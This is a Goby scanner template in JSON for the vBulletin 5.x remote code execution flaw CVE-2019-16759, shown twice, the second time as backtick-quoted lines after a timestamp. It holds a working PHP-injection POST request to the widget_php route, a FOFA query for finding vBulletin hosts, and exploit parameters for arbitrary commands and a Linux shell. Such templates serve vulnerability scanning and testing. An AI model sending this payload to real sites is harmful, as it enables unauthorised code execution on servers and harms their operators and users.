Goby/json/vBulletin-5.x-RCE-(CVE-2019...

{
  "Name": "vBulletin 5.x RCE (CVE-2019-16759)",
  "Description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.",
  "Product": "vBulletin",
  "Homepage": "https://www.vbulletin.com/",
  "DisclosureDate": "2019-09-24",
  "Author": "gobysec@gmail.com",
  "GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/vBulletin/CVE-2019-16759/CVE-2019-16759.gif",
  "FofaQuery": "app=vBulletin",
  "GobyQuery": "app=vBulletin",
  "Level": "3",
  "Impact": "This issue may lead to Remote Code execution.",
  "Recommendation": "",
  "References": [
    "http://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html",
    "http://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.html",
    "http://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.html",
    "https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/",
    "https://seclists.org/fulldisclosure/2019/Sep/31",
    "https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/",
    "https://nvd.nist.gov/vuln/detail/CVE-2019-16759",
    "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759"
  ],
  "HasExp": true,
  "ExpParams": [{
                  "name": "AttackType",
                  "type": "select",
                  "value": "cmd,goby_shell_linux"
            },{
                  "name": "cmd",
                  "type": "input",
                  "value": "whoami",
					"show": "AttackType=cmd"
            }],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "data": "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+md5%28%27vBulletin%27%29%3B+exit%3B",
        "data_type": "text",
        "follow_redirect": true,
        "method": "POST",
		"header": {"Content-Type":"application/x-www-form-urlencoded"},
        "uri": "/index.php?routestring=ajax/render/widget_php"
      },
      "ResponseTest": {
        "checks": [
          {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "be4ea51d962be8308a0099ae1eb3ec63",
            "variable": "$body"
          }
        ],
        "operation": "AND",
        "type": "group"
      }
    }
  ],
  "ExploitSteps": null,
  "Tags": ["rce"],
  "CVEIDs": [
    "CVE-2019-16759"
  ],
  "CVSSScore": "9.8",
  "AttackSurfaces": {
    "Application": ["vBulletin"],
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}
auto 2022-11-25 02:08:58 -08:00			`{`
			`"Name": "vBulletin 5.x RCE (CVE-2019-16759)",`
			`"Description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.",`
			`"Product": "vBulletin",`
			`"Homepage": "https://www.vbulletin.com/",`
			`"DisclosureDate": "2019-09-24",`
			`"Author": "gobysec@gmail.com",`
			`"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/vBulletin/CVE-2019-16759/CVE-2019-16759.gif",`
			`"FofaQuery": "app=vBulletin",`
			`"GobyQuery": "app=vBulletin",`
			`"Level": "3",`
			`"Impact": "This issue may lead to Remote Code execution.",`
			`"Recommendation": "",`
			`"References": [`
			`"http://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html",`
			`"http://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.html",`
			`"http://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.html",`
			`"https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/",`
			`"https://seclists.org/fulldisclosure/2019/Sep/31",`
			`"https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/",`
			`"https://nvd.nist.gov/vuln/detail/CVE-2019-16759",`
			`"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759"`
			`],`
			`"HasExp": true,`
			`"ExpParams": [{`
			`"name": "AttackType",`
			`"type": "select",`
			`"value": "cmd,goby_shell_linux"`
			`},{`
			`"name": "cmd",`
			`"type": "input",`
			`"value": "whoami",`
			`"show": "AttackType=cmd"`
			`}],`
			`"ExpTips": {`
			`"Type": "",`
			`"Content": ""`
			`},`
			`"ScanSteps": [`
			`"AND",`
			`{`
			`"Request": {`
			`"data": "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+md5%28%27vBulletin%27%29%3B+exit%3B",`
			`"data_type": "text",`
			`"follow_redirect": true,`
			`"method": "POST",`
			`"header": {"Content-Type":"application/x-www-form-urlencoded"},`
			`"uri": "/index.php?routestring=ajax/render/widget_php"`
			`},`
			`"ResponseTest": {`
			`"checks": [`
			`{`
			`"bz": "",`
			`"operation": "contains",`
			`"type": "item",`
			`"value": "be4ea51d962be8308a0099ae1eb3ec63",`
			`"variable": "$body"`
			`}`
			`],`
			`"operation": "AND",`
			`"type": "group"`
			`}`
			`}`
			`],`
			`"ExploitSteps": null,`
			`"Tags": ["rce"],`
			`"CVEIDs": [`
			`"CVE-2019-16759"`
			`],`
			`"CVSSScore": "9.8",`
			`"AttackSurfaces": {`
			`"Application": ["vBulletin"],`
			`"Support": null,`
			`"Service": null,`
			`"System": null,`
			`"Hardware": null`
			`}`
			`}`